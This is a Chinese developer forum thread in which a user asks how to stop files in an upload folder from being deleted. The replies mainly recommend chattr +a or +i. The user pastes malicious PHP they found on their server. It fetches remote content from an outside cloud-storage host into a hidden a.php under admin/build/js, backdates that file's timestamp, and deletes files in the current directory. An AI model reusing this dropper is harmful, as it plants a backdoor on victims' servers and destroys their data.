问下大家有没有那种命令,强制不让删除某个文件夹下的所有文件

主要是我的代码,不知道是黑客盯上了还是咋的,通过上传接口上传指向目录里面的文件老是被删除了,就我希望不要 删除upload 文件夹下的文件,就是强制不能删那种
我找到为什么会删除所有文件了,是不知道哪里上传了一个php文件
file_put_contents(‘../admin/build/js/a.php’,file_get_contents(‘kja-1300831982.cos.ap-hongkong.myqc...));
touch(“../admin/build/js/a.php”,mktime(19,5,10,10,26,2013));
foreach(glob(‘./.php’) as $f)
unlink($f);
foreach(glob(‘./
.*’) as $f)
unlink($f);

《L05 电商实战》
从零开发一个电商项目,功能包括电商后台、商品 & SKU 管理、购物车、订单管理、支付宝支付、微信支付、订单退款流程、优惠券等
《L03 构架 API 服务器》
你将学到如 RESTFul 设计风格、PostMan 的使用、OAuth 流程,JWT 概念及使用 和 API 开发相关的进阶知识。
mengdodo
最佳答案
chattr +a  文件只能增加内容不能减少内容, 不能删除文件;
chattr +i 静态文件永不变。 文件有了i属性, 内容不能变,文件不能删除。
1年前 评论
讨论数量: 14

chattr

1年前 评论
donggan (楼主) 1年前

等一下,你说的是哪种情况?是up文件夹里默认有文件,上传一次文件后里面的文件就都没有了还是隔段时间没有了?系统框架用的啥?

1年前 评论
donggan (楼主) 1年前
deatil (作者) 1年前

把文件夹权限改成666?

1年前 评论
donggan (楼主) 1年前

chattr +a /var/log/messages

1年前 评论

chattr 命令

1年前 评论
Mutoulee

找到问题根本所在才是正解,不上删除那只是治标不治本,包括 chattr 也是,chattr 禁止删除了那也就禁止上传了,明显不符合你上传目录的功能作用。

1年前 评论
donggan (楼主) 1年前
mengdodo
chattr +a  文件只能增加内容不能减少内容, 不能删除文件;
chattr +i 静态文件永不变。 文件有了i属性, 内容不能变,文件不能删除。
1年前 评论

是不是upload文件夹加入版本控制了,自动部署每次把upload文件夹回滚了。

1年前 评论

讨论应以学习和精进为目的。请勿发布不友善或者负能量的内容,与人为善,比聪明更重要!